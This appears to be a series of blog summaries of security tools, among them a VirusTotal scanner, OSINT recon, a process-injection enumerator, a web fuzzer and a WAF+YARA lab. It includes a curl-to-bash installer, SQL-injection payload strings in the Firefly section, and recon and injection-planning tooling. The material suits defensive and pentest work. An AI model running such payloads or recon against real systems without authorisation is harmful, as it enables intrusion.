VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


Features

1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

Installation

Prerequisites

Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone https://github.com/samhaxr/VTScanner.git

Usage

To initiate VTScanner, follow these steps:

cd VTScanner
python3 VTScanner.py

Configuration

  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini

License

VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

Disclaimer

VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



Bryobio - NETWORK Pcap File Analysis

By: Zion3R


NETWORK Pcap File Analysis, It was developed to speed up the processes of SOC Analysts during analysis


Tested

OK Debian
OK Ubuntu

Requirements

$ pip install pyshark
$ pip install dpkt

$ Wireshark
$ Tshark
$ Mergecap
$ Ngrep

𝗜𝗡𝗦𝗧𝗔𝗟𝗟𝗔𝗧𝗜𝗢𝗡 𝗜𝗡𝗦𝗧𝗥𝗨𝗖𝗧𝗜𝗢𝗡𝗦

$ https://github.com/emrekybs/Bryobio.git
$ cd Bryobio
$ chmod +x bryobio.py

$ python3 bryobio.py



InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and urls that will be later analyzed to extract even more valuable information.


Infohound architecture

Installation

git clone https://github.com/xampla/InfoHound.git
cd InfoHound/infohound
mv infohound_config.sample.py infohound_config.py
cd ..
docker-compose up -d

You must add API Keys inside infohound_config.py file

Default modules

InfoHound has 2 different types of modules, those which retreives data and those which analyse it to extract more relevant information.

 Retrievval modules

Name Description
Get Whois Info Get relevant information from Whois register.
Get DNS Records This task queries the DNS.
Get Subdomains This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
Find Email It looks for emails using queries to Google and Bing.
Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

Analysis

Name Description
Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

Custom modules

InfoHound lets you create custom modules, you just need to add your script inside infohoudn/tool/custom_modules. One custome module has been added as an example which uses Holehe tool to check if the emails previously are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

Inspired by



Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

By: Zion3R


Easy and customisable pentest report creator based on simple web technologies.

SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


Your Benefits

Write in markdown
Design in HTML/VueJS
Render your report to PDF
Fully customizable
Self-hosted or Cloud
No need for Word

SysReptor Cloud

You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

Sign up here


SysReptor Self-Hosted

You prefer self-hosting? That's fine! You will need:

  • Ubuntu
  • Latest Docker (with docker-compose-plugin)

You can then install SysReptor with via script:

curl -s https://docs.sysreptor.com/install.sh | bash

After successful installation, access your application at http://localhost:8000/.

Get detailed installation instructions at Installation.





ZeusCloud - Open Source Cloud Security

By: Zion3R


ZeusCloud is an open source cloud security platform.

Discover, prioritize, and remediate your risks in the cloud.

  • Build an asset inventory of your AWS accounts.
  • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
  • Prioritize findings with graphical context.
  • Remediate findings with step by step instructions.
  • Customize security and compliance controls to fit your needs.
  • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

Quick Start

  1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
  2. Run: cd ZeusCloud && make quick-deploy
  3. Visit http://localhost:80

Check out our Get Started guide for more details.

A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

Sandbox

Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

Features

  • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
  • Graphical Context - Understand context behind security findings with graphical visualizations.
  • Access Explorer - Visualize who has access to what with an IAM visualization engine.
  • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
  • Configurability - Configure which security rules are active, which alerts should be muted, and more.
  • Security as Code - Modify rules or write your own with our extensible security as code approach.
  • Remediation - Follow step by step guides to remediate security findings.
  • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

Why ZeusCloud?

Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

We had to take action.

  • We noticed traditional cloud security tools are opaque, confusing, time consuming to set up, and expensive as you scale your cloud environment
  • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams by inundating them with non-contextual alerts
  • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
  • Best of all, you can use ZeusCloud for free!

Future Roadmap

  • Integrations with vulnerability scanners
  • Integrations with secret scanners
  • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
  • Support for Azure and GCP environments

Contributing

We love contributions of all sizes. What would be most helpful first:

  • Please give us feedback in our Slack.
  • Open a PR (see our instructions below on developing ZeusCloud locally)
  • Submit a feature request or bug report through Github Issues.

Development

Run containers in development mode:

cd frontend && yarn && cd -
docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

Reset neo4j and/or postgres data with the following:

rm -rf .compose/neo4j
rm -rf .compose/postgres

To develop on frontend, make the the code changes and save.

To develop on backend, run

docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

To access the UI, go to: http://localhost:80.

Security

Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

Open-source vs. cloud-hosted

This repo is freely available under the Apache 2.0 license.

We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#

By: Zion3R


Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.

This is a project that I started working on as I progressed through Offensive Security's PEN-300 course. One of my favorite modules from the course is the process injection & migration section which inspired me to be build a tool to help me be more efficient in during that activity. A special thanks goes out to ShadowKhan who provided valuable feedback which helped provide creative direction to make this utility visually appealing and enhanced its usability with suggested filtering capabilities.


Usage

Injection Enumeration >> https://github.com/gh0x0st Usage: wanderer [target options] <value> [filter options] <value> [output options] <value> Target Options: -i, --id, Target a single or group of processes by their id number -n, --name, Target a single or group of processes by their name -c, --current, Target the current process and reveal the current privilege level -a, --all, Target every running process Filter Options: --include-denied, Include instances where process access is denied --exclude-32, Exclude instances where the process architecture is 32-bit --exclude-64, Exclude instances where the process architecture is 64-bit --exclude-amsiloaded, Exclude instances where amsi.dll is a loaded process module --exclude-amsiunloaded, Exclude instances where amsi is not loaded process module --exclude-integrity, Exclude instances where the process integrity level is a specific value Output Options: --output-nested, Output the results in a nested style view -q, --quiet, Do not output the banner Examples: Enumerate the process with id 12345 C:\> wanderer --id 12345 Enumerate all processes with the names process1 and processs2 C:\> wanderer --name process1,process2 Enumerate the current process privilege level C:\> wanderer --current Enumerate all 32-bit processes C:\wanderer --all --exclude-64 Enumerate all processes where is AMSI is loaded C:\> wanderer --all --exclude-amsiunloaded Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32" dir="auto">
PS C:\> .\wanderer.exe

>> Process Injection Enumeration
>> https://github.com/gh0x0st

Usage: wanderer [target options] <value> [filter options] <value> [output options] <value>

Target Options:

-i, --id, Target a single or group of processes by their id number
-n, --name, Target a single or group of processes by their name
-c, --current, Target the current process and reveal the current privilege level
-a, --all, Target every running process

Filter Options:

--include-denied, Include instances where process access is denied
--exclude-32, Exclude instances where the process architecture is 32-bit
--exclude-64, Exclude instances where the process architecture is 64-bit
--exclude-amsiloaded, Exclude instances where amsi.dll is a loaded proces s module
--exclude-amsiunloaded, Exclude instances where amsi is not loaded process module
--exclude-integrity, Exclude instances where the process integrity level is a specific value

Output Options:

--output-nested, Output the results in a nested style view
-q, --quiet, Do not output the banner

Examples:

Enumerate the process with id 12345
C:\> wanderer --id 12345

Enumerate all processes with the names process1 and processs2
C:\> wanderer --name process1,process2

Enumerate the current process privilege level
C:\> wanderer --current

Enumerate all 32-bit processes
C:\wanderer --all --exclude-64

Enumerate all processes where is AMSI is loaded
C:\> wanderer --all --exclude-amsiunloaded

Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes
C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32

Screenshots

Example 1

Example 2

Example 3

Example 4

Example 5



Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R


This tools is very helpful for finding vulnerabilities present in the Web Applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
    • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc in order to scan ports, sites, hosts and network to find vulnerabilites like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No. Tool Name Serial No. Tool Name
1 whatweb 2 nmap
3 golismero 4 host
5 wget 6 uniscan
7 wafw00f 8 dirb
9 davtest 10 theharvester
11 xsser 12 fierce
13 dnswalk 14 dnsrecon
15 dnsenum 16 dnsmap
17 dmitry 18 nikto
19 whois 20 lbd
21 wapiti 22 devtest
23 sslyze

Working

Phase 1

  • User has to write:- "python3 web_scan.py (https or http) ://example.com"
  • At first program will note initial time of running, then it will make url with "www.example.com".
  • After this step system will check the internet connection using ping.
  • Functionalities:-
    • To navigate to helper menu write this command:- --help for update --update
    • If user want to skip current scan/test:- CTRL+C
    • To quit the scanner use:- CTRL+Z
    • The program will tell scanning time taken by the tool for a specific test.

Phase 2

  • From here the main function of scanner will start:
  • The scanner will automatically select any tool to start scanning.
  • Scanners that will be used and filename rotation (default: enabled (1)
  • Command that is used to initiate the tool (with parameters and extra params) already given in code
  • After founding vulnerability in web application scanner will classify vulnerability in specific format:-
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c or critical defines most vulnerability wheres l or low is for least vulnerable system

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

  • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical

Vulnerabilities

  • After this scanner will show results which inclues:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now, Scanner will tell about harmful effects of that specific type vulnerabilility.
  • Scanner tell about sources to know more about the vulnerabilities. (websites).
  • After this step, scanner suggests some remdies to overcome the vulnerabilites.

Phase 3

  • Scanner will Generate a proper report including
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for total scan
    • Details about each and every vulnerabilites.
  • Writing all scan files output into SA-Debug-ScanLog for debugging purposes under the same directory
  • For Debugging Purposes, You can view the complete output generated by all the tools named SA-Debug-ScanLog.

Use

Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
1 IPv6 2 Wordpress
3 SiteMap/Robot.txt 4 Firewall
5 Slowloris Denial of Service 6 HEARTBLEED
7 POODLE 8 OpenSSL CCS Injection
9 FREAK 10 Firewall
11 LOGJAM 12 FTP Service
13 STUXNET 14 Telnet Service
15 LOG4j 16 Stress Tests
17 WebDAV 18 LFI, RFI or RCE.
19 XSS, SQLi, BSQL 20 XSS Header not present
21 Shellshock Bug 22 Leaks Internal IP
23 HTTP PUT DEL Methods 24 MS10-070
25 Outdated 26 CGI Directories
27 Interesting Files 28 Injectable Paths
29 Subdomains 30 MS-SQL DB Service
31 ORACLE DB Service 32 MySQL DB Service
33 RDP Server over UDP and TCP 34 SNMP Service
35 Elmah 36 SMB Ports over TCP and UDP
37 IIS WebDAV 38 X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions , Feature Requests and Bug Reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub:@nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



Firefly - Black Box Fuzzer For Web Applications

By: Zion3R

Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.

Note:

Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.

 

Advantages

  • Hevy use of gorutines and internal hardware for great preformance
  • Built-in engine that handles each task for "x" response results inductively
  • Highly cusomized to handle more complex fuzzing
  • Filter options and request verifications to avoid junk results
  • Friendly error and debug output
  • Build in payloads (default list are mixed with the wordlist from seclists)
  • Payload tampering and encoding functionality

Features


Installation

go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

If the above install method do not work try the following:

git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h

Usage

Simple

firefly -h
firefly -u 'http://example.com/?query=FUZZ'

Advanced usage

Request

Different types of request input that can be used

Basic

firefly -u 'http://example.com/?query=FUZZ' --timeout 7000

Request with different methods and protocols

firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws

Pipeline

echo 'http://example.com/?query=FUZZ' | firefly 

HTTP Raw

firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'

This will send the HTTP Raw and auto detect all GET and/or POST parameters to fuzz.

firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ

B=2&C=3' -au replace

Request Verifier

Request verifier is the most important part. This feature let Firefly know the core behavior of the target your fuzz. It's important to do quality over quantity. More verfiy requests will lead to better quality at the cost of internal hardware preformance (depending on your hardware)

firefly -u 'http://example.com/?query=FUZZ' -e 

Payloads

Payload can be highly customized and with a good core wordlist it's possible to be able to fully adapt the payload wordlist within Firefly itself.

Payload debug

Display the format of all payloads and exit

firefly -show-payload

Tampers

List of all Tampers avalible

firefly -list-tamper

Tamper all paylodas with given type (More than one can be used separated by comma)

firefly -u 'http://example.com/?query=FUZZ' -e s2c

Encode

firefly -u 'http://example.com/?query=FUZZ' -e hex

Hex then URL encode all payloads

firefly -u 'http://example.com/?query=FUZZ' -e hex,url

Payload regex replace

firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'

The Payloads: ' or (1=1)-- - and " or(20=20)or " Will result in: ' or (13=(37-24))-- - and " or(13=(37-24))or " Where the => (with spaces) inducate the "replace to".

Filters

Filter options to filter/match requests that include a given rule.

Filter response to ignore (filter) status code 302 and line count 0

firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0

Filter responses to include (match) regex, and status code 200

firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200

Preformance

Preformance and time delays to use for the request process

Threads / Concurrency

firefly -u 'http://example.com/?query=FUZZ' -t 35

Time Delay in millisecounds (ms) for each Concurrency

FireFly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000

Wordlists

Wordlist that contains the paylaods can be added separatly or extracted from a given folder

Single Wordlist with its attack type

firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz

Extract all wordlists inside a folder. Attack type is depended on the suffix <type>_wordlist.txt

firefly -u 'http://example.com/?query=FUZZ' -w wl/

Example

Wordlists names inside folder wl :

  1. fuzz_wordlist.txt
  2. time_wordlist.txt

Output

JSON output is strongly recommended. This is because you can benefit from the jq tool to navigate throw the result and compare it.

(If Firefly is pipeline chained with other tools, standard plaintext may be a better choice.)

Simple plaintext output format

firefly -u 'http://example.com/?query=FUZZ' -o file.txt

JSON output format (recommended)

firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

Community

Everyone in the community are allowed to suggest new features, improvements and/or add new payloads to Firefly just make a pull request or add a comment with your suggestions!



Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)

By: Zion3R

WAFARAY is a LAB deployment based on Debian 11.3.0 (stable) x64 made and cooked between two main ingredients WAF + YARA to detect malicious files (e.g. webshells, virus, malware, binaries) typically through web functions (upload files).


Purpose

In essence, the main idea came to use WAF + YARA (YARA right-to-left = ARAY) to detect malicious files at the WAF level before WAF can forward them to the backend e.g. files uploaded through web functions see: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

When a web page allows uploading files, most of the WAFs are not inspecting files before sending them to the backend. Implementing WAF + YARA could provide malware detection before WAF forwards the files to the backend.

Do malware detection through WAF?

Yes, one solution is to use ModSecurity + Clamav, most of the pages call ClamAV as a process and not as a daemon, in this case, analysing a file could take more than 50 seconds per file. See this resource: https://kifarunix.com/intercept-malicious-file-upload-with-modsecurity-and-clamav/

Do malware detection through WAF + YARA?

:-( A few clues here Black Hat Asia 2019 please continue reading and see below our quick LAB deployment.

WAFARAY: how does it work ?

Basically, It is a quick deployment (1) with pre-compiled and ready-to-use YARA rules via ModSecurity (WAF) using a custom rule; (2) this custom rule will perform an inspection and detection of the files that might contain malicious code, (3) typically web functions (upload files) if the file is suspicious will reject them receiving a 403 code Forbidden by ModSecurity.

✔️The YaraCompile.py compiles all the yara rules. (Python3 code)
✔️The test.conf is a virtual host that contains the mod security rules. (ModSecurity Code)
✔️ModSecurity rules calls the modsec_yara.py in order to inspect the file that is trying to upload. (Python3 code)
✔️Yara returns two options 1 (200 OK) or 0 (403 Forbidden)

Main Paths:

  • Yara Compiled rules: /YaraRules/Compiled
  • Yara Default rules: /YaraRules/rules
  • Yara Scripts: /YaraRules/YaraScripts
  • Apache vhosts: /etc/apache2/sites-enabled
  • Temporal Files: /temporal

Approach

  • Blueteamers: Rule enforcement, best alerting, malware detection on files uploaded through web functions.
  • Redteamers/pentesters: GreyBox scope , upload and bypass with a malicious file, rule enforcement.
  • Security Officers: Keep alerting, threat hunting.
  • SOC: Best monitoring about malicious files.
  • CERT: Malware Analysis, Determine new IOC.

Building Detection Lab

The Proof of Concept is based on Debian 11.3.0 (stable) x64 OS system, OWASP CRC v3.3.2 and Yara 4.0.5, you will find the automatic installation script here wafaray_install.sh and an optional manual installation guide can be found here: manual_instructions.txt also a PHP page has been created as a "mock" to observe the interaction and detection of malicious files using WAF + YARA.

Installation (recommended) with shell scripts

✔️Step 2: Deploy using VMware or VirtualBox
✔️Step 3: Once installed, please follow the instructions below:
alex@waf-labs:~$ su root 
root@waf-labs:/home/alex#

# Remember to change YOUR_USER by your username (e.g waf)
root@waf-labs:/home/alex# sed -i 's/^\(# User privi.*\)/\1\nalex ALL=(ALL) NOPASSWD:ALL/g' /etc/sudoers
root@waf-labs:/home/alex# exit
alex@waf-labs:~$ sudo sed -i 's/^\(deb cdrom.*\)/#\1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb\-src http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ echo -ne "\n\ndeb http://deb.debian.org/debian/ bullseye main\ndeb-src http://deb.debian.org/debian/ bullseye main\n" | sudo tee -a /etc/apt/sources.list
alex@waf-labs:~$ sudo apt-get update
alex@waf-labs:~$ sudo apt-get install sudo -y
alex@waf-labs:~$ sudo apt-get install git vim dos2unix net-tools -y
alex@waf-labs:~$ git clone https://github.com/alt3kx/wafarayalex@waf-labs:~$ cd wafaray
alex@waf-labs:~$ dos2unix wafaray_install.sh
alex@waf-labs:~$ chmod +x wafaray_install.sh
alex@waf-labs:~$ sudo ./wafaray_install.sh >> log_install.log

# Test your LAB environment
alex@waf-labs:~$ firefox localhost:8080/upload.php

Yara Rules

Once the Yara Rules were downloaded and compiled.

It is similar to when you deploy ModSecurity, you need to customize what kind of rule you need to apply. The following log is an example of when the Web Application Firewall + Yara detected a malicious file, in this case, eicar was detected.

Message: Access denied with code 403 (phase 2). File "/temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA" rejected by 
the approver script "/YaraRules/YaraScripts/modsec_yara.py": 0 SUSPECTED [YaraSignature: eicar]
[file "/etc/apache2/sites-enabled/test.conf"] [line "56"] [id "500002"]
[msg "Suspected File Upload:eicar.com.txt -> /temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA - URI: /upload.php"]

Testing WAFARAY... voilà...

Stop / Start ModSecurity

$ sudo service apache2 stop
$ sudo service apache2 start

Apache Logs

$ cd /var/log
$ sudo tail -f apache2/test_access.log apache2/test_audit.log apache2/test_error.log

Demos

Be careful about your test. The following demos were tested on isolated virtual machines.

Demo 1 - EICAR

A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware: https://secure.eicar.org/eicar.com.txt) NOT EXECUTE THE FILE.

Demo 2 - WebShell.php

For this demo, we disable the rule 933110 - PHP Inject Attack to validate Yara Rules. A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of WebShell PHP: https://github.com/drag0s/php-webshell) NOT EXECUTE THE FILE.

Demo 3 - Malware Bazaar (RecordBreaker) Published: 2022-08-13

A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware Bazaar (RecordBreaker): https://bazaar.abuse.ch/sample/94ffc1624939c5eaa4ed32d19f82c369333b45afbbd9d053fa82fe8f05d91ac2/) NOT EXECUTE THE FILE.

YARA Rules sources

In case that you want to download more yara rules, you can see the following repositories:

References

Roadmap until next release

  • Malware Hash Database (MLDBM). The Database stores the MD5 or SHA1 that files were detected as suspicious.
  • To be tested CRS Modsecurity v.3.3.3 new rules
  • ModSecurity rules improvement to malware detection with Database.
  • To be created blacklist and whitelist related to MD5 or SHA1.
  • To be tested, run in background if the Yara analysis takes more than 3 seconds.
  • To be tested, new payloads, example: Powershell Obfuscasted (WebShells)
  • Remarks for live enviroments. (WAF AWS, WAF GCP, ...)

Authors

Alex Hernandez aka (@_alt3kx_)
Jesus Huerta aka @mindhack03d

Contributors

Israel Zeron Medina aka @spk085



SpiderSuite - Advance Web Spider/Crawler For Cyber Security Professionals

By: Zion3R


An advance cross-platform and multi-feature GUI web spider/crawler for cyber security proffesionals. Spider Suite can be used for attack surface mapping and analysis. For more information visit SpiderSuite's website.


Installation and Usage

Spider Suite is designed for easy installation and usage even for first timers.

  • First, download the package of your choice.

  • Then install the downloaded SpiderSuite package.

  • See First time crawling with SpiderSuite article for tutorial on how to get started.

For complete documentation of Spider Suite see wiki.

Contributing

Can you translate?

Visit SpiderSuite's translation project to make translations to your native language.

Not a developer?

You can help by reporting bugs, requesting new features, improving the documentation, sponsoring the project & writing articles.

For More information see contribution guide.

Contributers

Credits

This product includes software developed by the following open source projects:



Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

By: Zion3R

OWASP Global AppSec Dublin - talk and demo


Features

  • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
  • scan Cloudflare for vulnerable DNS records
  • take over vulnerable subdomains yourself before attackers and bug bounty researchers
  • automatically create known issues in Bugcrowd or HackerOne
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
  • manual scans of cloud accounts with no installation

Installation

Collaboration

